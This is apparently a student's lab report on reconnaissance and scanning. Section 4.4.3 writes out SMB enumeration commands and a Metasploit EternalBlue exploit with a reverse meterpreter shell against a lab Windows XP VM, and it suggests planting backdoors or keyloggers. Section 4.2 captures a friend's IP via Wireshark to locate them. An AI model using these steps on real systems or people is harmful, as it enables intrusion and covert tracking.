20232423 2025-2026-1 《网络与系统攻防技术》实验五实验报告
一、实验内容
(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:
DNS注册人及联系方式、该域名对应IP地址、IP地址注册人及联系方式、IP地址所在国家、城市和具体地理位置
PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机IP地址是否活跃、靶机开放了哪些TCP和UDP端口、靶机安装了什么操作系统、版本是多少、靶机上安装了哪些服务
(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机上开放了哪些端口、靶机各个端口上网络服务存在哪些安全漏洞、你认为如何攻陷靶机环境,以获得系统访问权
(5)①通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。
②并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)
二、实验目的
学习使用搜索引擎、扫描引擎、扫描工具分析目标状态。实现对目标信息的全面了解
三、实验环境
虚拟机VMware中Kali的linux环境和虚拟机VMware中WinXP环境,WinXP配置如下:(教程https://blog.csdn.net/weixin_52799373/article/details/144051549)

四、实验过程
4.1查询baidu.com的DNS域名
4.1.1查询DNS注册人及联系方式
在kali虚拟机中使用命令whois baidu.com,查询该域名的相关信息,如下图


从上图中可以看到注册人信息,注册商信息,联系方式等信息,具体信息如下
注册域名ID:11181110_DOMAIN_COM-VRSN
注册商(Registrar):MarkMonitor Information Technology (Shanghai) Co., Ltd.
注册商IANA ID:3838
注册商滥用投诉电话(Registrar Abuse Contact Email):+1.2083895740
注册商滥用投诉邮箱(Registrar Abuse Contact Phone):abusecomplaints@markmonitor.com
注册人组织(Registrant Organization):北京百度网讯科技有限公司。
注册人国家(Registrant Country):CN(中国)。
若需要获取注册人邮箱(Registrant Email)和技术邮箱(Tech Email),需通过指定链接(https://domains.markmonitor.com/whois/baidu.com)的表单申请。
4.1.2查询该域名对应IP地址
使用命令dig baidu.com查询DNS解析信息,可查询所用的DNS服务器、返回的IP地址、TTL及查询耗时等信息,如下图:

从返回数据可以知道,状态(status)为NOERROR,表示查询成功,没有错误。这条dig命令成功获取了baidu.com的4个IPv4解析地址(111.63.65.33、110.242.74.102、111.63.65.240、124.237.177.164)。
接着使用命令nslookup baidu.com查询域名的DNS信息,如下图

从返回数据可以知道,使用的DNS服务器是8.8.8.8(谷歌公共DNS服务器),端口为53。baidu.com解析到4个IPv4地址,分别是:、124.237.177.164、111.63.65.33、110.242.74.102、111.63.65.240。这些地址与之前dig命令查询的结果一致,体现了百度域名的多IP负载均衡配置,用于提升服务可用性和访问速度。
4.1.3查询IP地址注册人及联系方式
随机选择上面获取到的4个IP地址中的一个进行查询,这里选择111.63.65.240。输入命令whois 111.63.65.240,可以得到IP地址的注册人和他的邮箱、电话以及IP地址的地址信息等内容,如下图。

从返回数据可以知道
IP地址段(inetnum): 111.0.0.0 - 111.63.255.255
网络名称(netname): CMNET
所属机构(descr): China Mobile Communications Corporation ,中国移动通信集团公司

从上图返回数据可以知道
角色(role):chinamobile tech,是中国移动的技术相关角色
地址(address):北京市西城区金融大街29号,位于中国(CN)
电话(phone):+86 5268 6688
传真(fax-no):+86 5261 6187
邮箱(e-mail):hostmaster@chinamobile.com
滥用投诉邮箱(abuse-mailbox):abuse@chinamobile.com

从上图返回数据可以知道
姓名(person):haijun li
邮箱(e-mail):hostmaster@chinamobile.com
地址(address):北京市西城区金融大街29号,邮编 100032
电话(phone):+86 1052686688
传真(fax-no):+86 1052616187
国家(country):中国
滥用投诉邮箱(abuse-mailbox):abuse@chinamobile.com
4.1.4查询IP地址所在国家、城市和具体地理位置
输入命令traceroute baidu.com,如下图

从上图返回数据可以知道,得到两个不一样的百度网站的IP地址,分别是:124.237.177.164、111.63.65.33。
两者从第2跳开始出现大量* * *,表示这些路由节点未对traceroute的探测包做出响应。原因可能有:
①节点开启了ICMP限制(出于安全或策略原因,拒绝回应traceroute类探测);
②网络路径中存在防火墙、负载均衡设备等,屏蔽了探测流量;
③部分中间节点本身不支持或不响应traceroute协议。
然后使用“UU在线工具”(https://uutool.cn/ip/)查询上面得到的两个IP地址的具体位置,如下图


4.2 获取好友IP地址,并查询地理位置
4.2.1获取IP地址
给某一微信好友打语音电话并开启wireshark抓包,使用命令udp and ip.addr==192.168.3.21筛选IP为主机地址,并且传输协议为UDP的数据包,如下图:

从中可以看到,与192.168.3.21通信的地址是116.163.21.17
4.2.1查询IP地址
通过刚才的网站对该ip地址进行位置查找,如下图,其实差得有点远啊,我好友在贵州,但是捕获到的ip地址却是在湖南长沙(试了很多次都是这样)

4.3 用nmap开源软件对靶机环境进行扫描
此处使用WinXP虚拟机作为靶机,Kali虚拟机作为攻击机。配置该靶机可以参考教程:https://blog.csdn.net/weixin_52799373/article/details/144051549
安装完成后,分别查看靶机与攻击机的IP地址,如下图,靶机IP地址为192.168.209.149,攻击机的IP地址为192.168.209.128。


在进行nmap扫描之前,要先关闭WinXP的防火墙(不然扫描出来的端口都是关闭的)
4.3.1查看靶机IP地址是否活跃
通过命令nmap -sn 192.168.209.149进行ping扫描,查询靶机是否在线。如下图,目标主机192.168.209.149处于开机状态(Host is up),说明靶机IP活跃。

4.3.2查看靶机开放了的TCP和UDP端口
通过命令nmap -sS 192.168.209.149进行SYN半开扫描,查询靶机开放的TCP端口,如下图

共扫描了1000个TCP端口,其中997个端口处于关闭状态(closed tcp ports)并返回RST响应,另有3个端口处于开放状态:
135端口:主要用于使用RPC协议并提供DCOM服务
139端口:主要用于NetBIOS会话服务,用于Windows文件共享等功能
445端口:主要用于Microsoft目录服务,支持SMB协议的文件和打印机共享
通过命令nmap -sU 192.168.209.149进行UDP扫描,查询靶机开放的UDP端口,如下图

共扫描了1000个UDP端口,其中993个端口处于关闭状态(closed udp ports)并返回port-unreach(端口不可达)响应,另有7个端口处于open或open|filtered状态:
123端口:运行网络时间协议,用于系统时间同步
137端口:运行NetBIOS名称服务,用于Windows网络的名称解析
138端口:运行NetBIOS数据报服务,支持Windows网络的广播通信
445端口:运行微软目录服务,支持SMB协议的文件和打印机共享
500端口:运行互联网安全关联和密钥管理协议,用于VPN等加密通信的密钥协商
1900端口:运行upnp服务,通用即插即用,用于设备发现和网络服务配置
4500端口:运行IPsec NAT穿越的IKE协议,用于VPN在NAT环境下的通信
4.3.3查看靶机安装的操作系统,
通过命令nmap -O 192.168.209.149,查询靶机安装的操作系统及版本,如下图:

可以看到,设备类型为通用设备(general purpose),运行的系统是Microsoft Windows XP,具体版本为SP2或SP3。
4.3.4查看靶机安装的服务
通过命令nmap -sV 192.168.209.149,查询靶机安装的服务,如下图:

可以看到,安装的服务有:
135端口:Microsoft Windows RPC(远程过程调用)服务,用于Windows系统中组件间的远程通信与服务调用。
139端口:Microsoft Windows NetBIOS会话服务,支持Windows网络中的文件共享、名称解析等功能。
445端口:Microsoft Windows XP下的微软目录服务,基于SMB协议,提供文件和打印机共享等服务。
4.4 用Nessus开源软件对靶机环境进行扫描
在Kali虚拟机上下载nessus,下载教程参考网址:https://blog.csdn.net/weixin_48886225/article/details/140269127。
4.4.1 靶机上开放的端口
通过https://localhost:8834打开nessus,选择create new scan,选择其中的host discovery。在扫描配置界面,输入任务名称、描述、文件夹与目标主机。前三个可以任意填写,随后一个需填写靶机的IP地址,如下图

保存并进行扫描,扫描结果如下图,可以看到靶机开放了135、139、445端口,与用nmap扫描的结果相同

4.4.2 靶机各个端口上网络服务存在的安全漏洞
创建一个新的扫描,选择Advanced Scan高级扫描,并使用同样的方式进行配置,保存并进行扫描,扫描结果如下图所示

从图中可以看到,出现了Critical(严重)、High(高)、Medium(中)、Low(低)四类风险等级,还有Info信息类。
Microsoft Windows XP Unsupported Installation Detection(严重),这是最严重的漏洞,因为Windows XP早已停止官方支持,不再获得安全补丁,意味着系统将持续暴露在已知和未知的安全威胁中,被攻击的风险极高。
SMB NULL Session Authentication(高),SMB空会话认证漏洞允许攻击者在未授权的情况下获取系统信息,甚至进一步渗透,EPSS(漏洞可利用性评分系统)为0.0866,说明有一定的实际利用概率。
ICMP Timestamp Request Remote Date Disclosure(低),该漏洞通过ICMP时间戳请求可远程获取系统日期信息,虽风险较低,但可能为攻击者提供系统指纹信息,辅助后续攻击。
各类Multiple Issues(中等),这类聚合型漏洞说明Windows系统和SMB协议存在多处安全问题,需逐一排查修复。
信息性漏洞(如Nessus SYN scanner),主要是用于识别扫描工具、系统平台枚举等信息,虽无直接危害,但会为攻击者提供系统轮廓,间接增加风险。
4.4.3 攻陷靶机环境,以获得系统访问权
结合靶机Win XP系统的漏洞特征(未受官方支持、SMB 空会话漏洞、ICMP 时间戳泄露等),可采用信息枚举、漏洞利用、权限获取等方式进行攻击,具体攻击方式如下:
(1)SMB协议漏洞利用
- 原理:
靶机存在“SMB NULL Session Authentication”高风险漏洞,允许攻击者在未提供用户名密码的情况下建立匿名空会话,获取系统敏感信息后进一步渗透。 - 工具与步骤:
①信息枚举:使用enum4linux -a 192.168.209.149一键扫描,获取靶机主机名、用户列表、共享文件夹、密码策略等信息;或通过rpcclient -U "" -N 192.168.209.149执行enumdomusers命令枚举系统用户,getdompwinfo查询密码复杂度策略。
②远程代码执行:利用WinXP未修复的SMBv1协议漏洞(如MS17-010 “永恒之蓝”),通过Metasploit框架发起攻击。启动msfconsole后,加载模块use exploit/windows/smb/ms17_010_eternalblue,设置靶机IPset RHOSTS 192.168.209.149、攻击机 IPset LHOST 本地IP,选择反弹shell载荷windows/x64/meterpreter/reverse_tcp,执行exploit即可获取SYSTEM权限的Meterpreter会话。
③共享资源访问:通过smbclient -L //192.168.209.149 -N列出匿名可访问的共享文件夹,若存在可写权限的共享目录,可上传恶意脚本(如后门程序、键盘记录器)实现持久化控制。
(2)ICMP 信息辅助攻击 - 原理:
靶机存在 “ICMP Timestamp Request Remote Date Disclosure” 漏洞,可通过时间戳响应辅助攻击者完成系统指纹识别与攻击时机判断。 - 工具与步骤:
使用nmap -p 0-65535 -sP -PE 192.168.209.149发送ICMP时间戳请求,分析响应包中的时间字段确认系统当前时间,结合漏洞利用工具的时间依赖特性(如某些EXP需精准控制内存布局)优化攻击参数;同时通过时间戳响应模式辅助验证操作系统版本,确认靶机为WinXP而非其他仿冒系统。
4.5搜索测试
4.5.1在网上搜索自己的足迹
在网页上搜索自己的名字,发现出现的都不是我,可能是小张太“默默无闻”了。


但是如果搜索学号的话,虽然我的博客在整个页面比较靠中,但还是能把我搜出来


可以看到我的信息在网上暴露得并不多,能显示出来的也都无伤大雅。
4.5.2练习使用Google hack搜集技能完成搜索
(1)site:限制搜索结果为特定网站或域名
site:cnblogs.com nessus安装,搜索博客园中含“nessus安装”的内容

(2)intitle:用于搜索网页标题中包含特定关键词的网页。
intitle:洋芋粑,搜索网页标题中包含“洋芋粑”的网页.其实这个跟直接搜索也差不多了。

(3)inurl:搜索URL中包含特定关键词的页面。
inurl:login,会搜索所有URL中包含login关键词的网页,即定位登录页面

(4)filetype:搜索特定文件类型的文件。
filetype:pdf 学习,搜索所有包含学习关键词的PDF文件。

(5)intext:搜索网页正文中包含特定关键词的网页。
intext:辣子鸡,搜索网页正文中包含辣子鸡的网页

(6):通配符匹配任何未知词,在词组中代替一个或多个未知词。。
的美食,可查找出各种美食信息

(7)allintitle:查找标题中同时包含多个关键词的页面
allintitle:贵州 美食,查找标题中同时包含“贵州”和“美食”的页面

(8)OR:A OR B,系统查找含有检索词A、B之一,或同时包括检索词A和检索词B的信息。
黑客 or 电影,查找含有检索词黑客或者电影的信息

(9)NOT:A NOT B,查找A相关内容,且A中没有B。
留学NOT英国,查找除英国外的其他留学信息

(10)info:指定域名,查询网站的基础信息,如缓存时间、收录状态等。
info:google.com。可用于展示谷歌官网的基本索引信息

五、问题及解决
无
六、学习感悟
本次实验,应该是目前做过来的几个最简单的一个了。
本次实验让我对网络信息搜集、漏洞扫描与渗透测试有了更系统、更深入的理解。通过实际操作,我不仅掌握了多种工具的使用方法,还进一步认识到信息收集在网络安全攻防中的重要性。
在DNS信息查询环节,我学会了使用whois、dig、nslookup、traceroute等命令,结合在线工具,全面获取目标域名的注册信息、IP地址、地理位置等关键数据。这让我意识到,即使是公开信息,也可能成为攻击者进行社会工程学攻击或网络测绘的入口。
在获取好友IP并定位的过程中,我体会到网络通信中隐私泄露的潜在风险。通过Wireshark抓包分析,我直观地看到了实时通信中的IP暴露问题(其实有一种开别人户的爽感)
在nmap和Nessus扫描部分,我学会了如何探测目标主机的活跃状态、开放端口、操作系统及服务版本,还初步掌握了漏洞分析与风险评估的方法。
在Google Hacking部分,我学习到了了多种搜索语法,能够更精准地查询到我想要的内容。
总的来说,收获很多。
浙公网安备 33010602011771号